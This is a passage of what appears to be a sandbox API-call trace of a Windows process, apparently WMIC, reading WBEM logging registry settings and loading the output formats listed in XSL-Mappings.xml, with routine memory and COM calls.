[0299.629] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0299.629] SysStringLen (param_1="PKT") returned 0x3 [0299.629] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0299.629] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.629] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0299.629] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0299.629] malloc (_Size=0x18) returned 0x34e2d60 [0299.629] malloc (_Size=0x40) returned 0x34e0520 [0299.629] malloc (_Size=0x20a) returned 0x34e97c8 [0299.629] GetSystemDirectoryW (in: lpBuffer=0x34e97c8, uSize=0x105 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0299.629] free (_Block=0x34e97c8) [0299.629] malloc (_Size=0xc) returned 0x34e0568 [0299.629] malloc (_Size=0xc) returned 0x34e0580 [0299.629] malloc (_Size=0xc) returned 0x34e2d80 [0299.629] SysStringLen (param_1="C:\\WINDOWS\\system32") returned 0x13 [0299.629] SysStringLen (param_1="\\wbem\\") returned 0x6 [0299.629] free (_Block=0x34e0568) [0299.629] free (_Block=0x34e0580) [0299.629] SysStringByteLen (bstr="C:\\WINDOWS\\system32\\wbem\\") returned 0x32 [0299.630] free (_Block=0x34e2d80) [0299.630] malloc (_Size=0xc) returned 0x34e9958 [0299.630] malloc (_Size=0xc) returned 0x34e9898 [0299.630] malloc (_Size=0xc) returned 0x34e98c8 [0299.630] SysStringLen (param_1="C:\\WINDOWS\\system32\\wbem\\") returned 0x19 [0299.630] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0299.630] free (_Block=0x34e9958) [0299.630] free (_Block=0x34e9898) [0299.630] GetCurrentThreadId () returned 0x12ac [0299.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x323f90c | out: phkResult=0x323f90c*=0x1a0) returned 0x0 [0299.630] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x323f918, lpcbData=0x323f914*=0x400 | out: lpType=0x0, lpData=0x323f918*=0x30, lpcbData=0x323f914*=0x4) returned 0x0 [0299.631] _wcsicmp (_String1="0", _String2="1") returned -1 [0299.631] _wcsicmp (_String1="0", _String2="2") returned -2 [0299.631] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x323f914*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x323f914*=0x42) returned 0x0 [0299.631] malloc (_Size=0x86) returned 0x34e2d80 [0299.631] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x34e2d80, lpcbData=0x323f914*=0x42 | out: lpType=0x0, lpData=0x34e2d80*=0x25, lpcbData=0x323f914*=0x42) returned 0x0 [0299.631] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0299.631] malloc (_Size=0x42) returned 0x34e2e10 [0299.631] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0299.631] RegQueryValueExW (in: hKey=0x1a0, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x323f918, lpcbData=0x323f914*=0x400 | out: lpType=0x0, lpData=0x323f918*=0x36, lpcbData=0x323f914*=0xc) returned 0x0 [0299.631] _wtol (_String="65536") returned 65536 [0299.631] free (_Block=0x34e2d80) [0299.631] RegCloseKey (hKey=0x0) returned 0x6 [0299.631] CoCreateInstance (in: rclsid=0xa26ad4*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26ae4*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x323fda8 | out: ppv=0x323fda8*=0x34945a8) returned 0x0 [0299.654] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x34945a8, xmlSource=0x323fd2c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\WINDOWS\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x323fd94 | out: isSuccessful=0x323fd94*=0xffff) returned 0x0 [0299.893] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x34945a8, DOMElement=0x323fda4 | out: DOMElement=0x323fda4*=0x3496b48) returned 0x0 [0299.894] malloc (_Size=0xc) returned 0x34e98b0 [0299.894] IXMLDOMElement:getElementsByTagName (in: This=0x3496b48, tagName="XSLFORMAT", resultList=0x323fda0 | out: resultList=0x323fda0*=0x3499ca0) returned 0x0 [0299.896] free (_Block=0x34e98b0) [0299.896] IXMLDOMNodeList:get_length (in: This=0x3499ca0, listLength=0x323fd9c | out: listLength=0x323fd9c*=21) returned 0x0 [0299.896] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=0, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.897] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.897] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.897] malloc (_Size=0xc) returned 0x34e9838 [0299.897] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.897] free (_Block=0x34e9838) [0299.897] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0 [0299.897] malloc (_Size=0xc) returned 0x34e9898 [0299.897] malloc (_Size=0xc) returned 0x34e97f0 [0299.897] malloc (_Size=0x18) returned 0x34e2a20 [0299.898] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.898] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.898] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.898] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=1, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.898] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="textvaluelist.xsl") returned 0x0 [0299.898] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.898] malloc (_Size=0xc) returned 0x34e9838 [0299.898] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.898] free (_Block=0x34e9838) [0299.898] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0 [0299.899] malloc (_Size=0xc) returned 0x34e9910 [0299.899] malloc (_Size=0xc) returned 0x34e9808 [0299.899] SysStringLen (param_1="VALUE") returned 0x5 [0299.899] SysStringLen (param_1="TABLE") returned 0x5 [0299.899] SysStringLen (param_1="TABLE") returned 0x5 [0299.899] SysStringLen (param_1="VALUE") returned 0x5 [0299.899] malloc (_Size=0x18) returned 0x34e2ba0 [0299.899] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.899] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.899] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.899] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=2, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.899] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="textvaluelist.xsl") returned 0x0 [0299.899] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.899] malloc (_Size=0xc) returned 0x34e9820 [0299.899] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.900] free (_Block=0x34e9820) [0299.900] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0 [0299.900] malloc (_Size=0xc) returned 0x34e9928 [0299.900] malloc (_Size=0xc) returned 0x34e9958 [0299.900] SysStringLen (param_1="LIST") returned 0x4 [0299.900] SysStringLen (param_1="TABLE") returned 0x5 [0299.900] malloc (_Size=0x18) returned 0x34e2aa0 [0299.900] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.900] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.900] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.900] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=3, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.900] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="rawxml.xsl") returned 0x0 [0299.900] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.901] malloc (_Size=0xc) returned 0x34e9940 [0299.901] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.901] free (_Block=0x34e9940) [0299.901] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0 [0299.901] malloc (_Size=0xc) returned 0x34e9988 [0299.901] malloc (_Size=0xc) returned 0x34e9850 [0299.901] SysStringLen (param_1="RAWXML") returned 0x6 [0299.901] SysStringLen (param_1="TABLE") returned 0x5 [0299.901] SysStringLen (param_1="RAWXML") returned 0x6 [0299.901] SysStringLen (param_1="LIST") returned 0x4 [0299.901] SysStringLen (param_1="LIST") returned 0x4 [0299.901] SysStringLen (param_1="RAWXML") returned 0x6 [0299.901] malloc (_Size=0x18) returned 0x34e2a80 [0299.901] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.901] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.901] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.901] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=4, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.902] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="htable.xsl") returned 0x0 [0299.902] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.902] malloc (_Size=0xc) returned 0x34e98e0 [0299.902] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.902] free (_Block=0x34e98e0) [0299.902] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0 [0299.902] malloc (_Size=0xc) returned 0x34e99a0 [0299.902] malloc (_Size=0xc) returned 0x34e9940 [0299.902] SysStringLen (param_1="HTABLE") returned 0x6 [0299.902] SysStringLen (param_1="TABLE") returned 0x5 [0299.902] SysStringLen (param_1="HTABLE") returned 0x6 [0299.902] SysStringLen (param_1="LIST") returned 0x4 [0299.902] malloc (_Size=0x18) returned 0x34e2d20 [0299.902] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.903] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.903] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.903] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=5, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.903] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="hform.xsl") returned 0x0 [0299.903] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.903] malloc (_Size=0xc) returned 0x34e99b8 [0299.903] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.903] free (_Block=0x34e99b8) [0299.903] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0 [0299.903] malloc (_Size=0xc) returned 0x34e98e0 [0299.903] malloc (_Size=0xc) returned 0x34e98b0 [0299.903] SysStringLen (param_1="HFORM") returned 0x5 [0299.903] SysStringLen (param_1="TABLE") returned 0x5 [0299.904] SysStringLen (param_1="HFORM") returned 0x5 [0299.904] SysStringLen (param_1="LIST") returned 0x4 [0299.904] SysStringLen (param_1="HFORM") returned 0x5 [0299.904] SysStringLen (param_1="HTABLE") returned 0x6 [0299.904] malloc (_Size=0x18) returned 0x34e2ac0 [0299.904] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.904] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.904] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.904] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=6, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.904] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="xml.xsl") returned 0x0 [0299.904] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.904] malloc (_Size=0xc) returned 0x34e99b8 [0299.904] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.904] free (_Block=0x34e99b8) [0299.905] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0 [0299.905] malloc (_Size=0xc) returned 0x34e98f8 [0299.905] malloc (_Size=0xc) returned 0x34e9970 [0299.905] SysStringLen (param_1="XML") returned 0x3 [0299.905] SysStringLen (param_1="TABLE") returned 0x5 [0299.905] SysStringLen (param_1="XML") returned 0x3 [0299.905] SysStringLen (param_1="VALUE") returned 0x5 [0299.905] SysStringLen (param_1="VALUE") returned 0x5 [0299.905] SysStringLen (param_1="XML") returned 0x3 [0299.905] malloc (_Size=0x18) returned 0x34e2c20 [0299.905] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.905] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.905] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.905] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=7, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.905] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="mof.xsl") returned 0x0 [0299.905] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.905] malloc (_Size=0xc) returned 0x34e99b8 [0299.906] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.906] free (_Block=0x34e99b8) [0299.906] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0 [0299.906] malloc (_Size=0xc) returned 0x34e99b8 [0299.906] malloc (_Size=0xc) returned 0x34e9820 [0299.906] SysStringLen (param_1="MOF") returned 0x3 [0299.906] SysStringLen (param_1="TABLE") returned 0x5 [0299.906] SysStringLen (param_1="MOF") returned 0x3 [0299.906] SysStringLen (param_1="LIST") returned 0x4 [0299.906] SysStringLen (param_1="MOF") returned 0x3 [0299.906] SysStringLen (param_1="RAWXML") returned 0x6 [0299.906] SysStringLen (param_1="LIST") returned 0x4 [0299.906] SysStringLen (param_1="MOF") returned 0x3 [0299.906] malloc (_Size=0x18) returned 0x34e2ae0 [0299.906] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.906] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.906] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.906] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=8, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.907] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="csv.xsl") returned 0x0 [0299.907] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.907] malloc (_Size=0xc) returned 0x34e9838 [0299.907] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.907] free (_Block=0x34e9838) [0299.907] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0 [0299.907] malloc (_Size=0xc) returned 0x34e9838 [0299.907] malloc (_Size=0xc) returned 0x34e9868 [0299.907] SysStringLen (param_1="CSV") returned 0x3 [0299.907] SysStringLen (param_1="TABLE") returned 0x5 [0299.907] SysStringLen (param_1="CSV") returned 0x3 [0299.907] SysStringLen (param_1="LIST") returned 0x4 [0299.907] SysStringLen (param_1="CSV") returned 0x3 [0299.907] SysStringLen (param_1="HTABLE") returned 0x6 [0299.907] SysStringLen (param_1="CSV") returned 0x3 [0299.907] SysStringLen (param_1="HFORM") returned 0x5 [0299.907] malloc (_Size=0x18) returned 0x34e2b00 [0299.908] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.909] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.909] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.909] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=9, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.909] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.909] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.909] malloc (_Size=0xc) returned 0x34e9880 [0299.909] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.909] free (_Block=0x34e9880) [0299.909] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0 [0299.909] malloc (_Size=0xc) returned 0x34e9880 [0299.909] malloc (_Size=0xc) returned 0x34eaba0 [0299.909] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.909] SysStringLen (param_1="TABLE") returned 0x5 [0299.910] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.910] SysStringLen (param_1="VALUE") returned 0x5 [0299.910] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.910] SysStringLen (param_1="XML") returned 0x3 [0299.910] SysStringLen (param_1="XML") returned 0x3 [0299.910] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.910] malloc (_Size=0x18) returned 0x34e2c40 [0299.910] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.910] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.910] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.910] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=10, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.910] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.910] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.910] malloc (_Size=0xc) returned 0x34eac30 [0299.910] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.910] free (_Block=0x34eac30) [0299.911] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0 [0299.911] malloc (_Size=0xc) returned 0x34ead20 [0299.911] malloc (_Size=0xc) returned 0x34eab40 [0299.911] SysStringLen (param_1="texttablewsys") returned 0xd [0299.911] SysStringLen (param_1="TABLE") returned 0x5 [0299.911] SysStringLen (param_1="texttablewsys") returned 0xd [0299.911] SysStringLen (param_1="XML") returned 0x3 [0299.911] SysStringLen (param_1="texttablewsys") returned 0xd [0299.911] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.911] SysStringLen (param_1="XML") returned 0x3 [0299.911] SysStringLen (param_1="texttablewsys") returned 0xd [0299.911] malloc (_Size=0x18) returned 0x34e2b20 [0299.911] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.911] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.911] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.911] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=11, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.911] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.911] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.912] malloc (_Size=0xc) returned 0x34eacc0 [0299.912] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.912] free (_Block=0x34eacc0) [0299.912] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0 [0299.912] malloc (_Size=0xc) returned 0x34eacd8 [0299.912] malloc (_Size=0xc) returned 0x34eabb8 [0299.912] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.912] SysStringLen (param_1="TABLE") returned 0x5 [0299.912] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.912] SysStringLen (param_1="XML") returned 0x3 [0299.912] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.912] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.912] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.912] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.912] malloc (_Size=0x18) returned 0x34e2a40 [0299.912] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.912] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.913] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.913] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=12, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.913] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.913] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.913] malloc (_Size=0xc) returned 0x34eacf0 [0299.913] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.913] free (_Block=0x34eacf0) [0299.913] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0 [0299.913] malloc (_Size=0xc) returned 0x34ead38 [0299.913] malloc (_Size=0xc) returned 0x34eabd0 [0299.913] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.913] SysStringLen (param_1="TABLE") returned 0x5 [0299.913] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.914] SysStringLen (param_1="XML") returned 0x3 [0299.914] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.914] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.914] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.914] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.914] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.914] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0299.914] malloc (_Size=0x18) returned 0x34e2b40 [0299.914] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.914] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.914] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.914] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=13, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.914] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.914] IXMLDOMNode:get_attributes (in: This=0x3496b88, attributeMap=0x323fdb8 | out: attributeMap=0x323fdb8*=0x3499fa8) returned 0x0 [0299.914] malloc (_Size=0xc) returned 0x34ead68 [0299.914] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x3499fa8, name="KEYWORD", namedItem=0x323fdb4 | out: namedItem=0x323fdb4*=0x3499ff8) returned 0x0 [0299.915] free (_Block=0x34ead68) [0299.915] IXMLDOMNode:get_nodeValue (in: This=0x3499ff8, value=0x323fd74 | out: value=0x323fd74*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0 [0299.915] malloc (_Size=0xc) returned 0x34ead68 [0299.915] malloc (_Size=0xc) returned 0x34eac30 [0299.915] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.915] SysStringLen (param_1="TABLE") returned 0x5 [0299.915] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.915] SysStringLen (param_1="XML") returned 0x3 [0299.915] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.915] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0299.915] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.915] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.915] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0299.915] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0299.915] malloc (_Size=0x18) returned 0x34e2d40 [0299.915] IUnknown:Release (This=0x3496b88) returned 0x0 [0299.915] IUnknown:Release (This=0x3499fa8) returned 0x0 [0299.915] IUnknown:Release (This=0x3499ff8) returned 0x0 [0299.915] IXMLDOMNodeList:get_item (in: This=0x3499ca0, index=14, listItem=0x323fdbc | out: listItem=0x323fdbc*=0x3496b88) returned 0x0 [0299.916] IXMLDOMNode:get_text (in: This=0x3496b88, text=0x323fdc0 | out: text=0x323fdc0*="texttable.xsl") returned 0x0 [0299.916] IXMLDOMNode:get_attributes (in: This=0x3496b88, 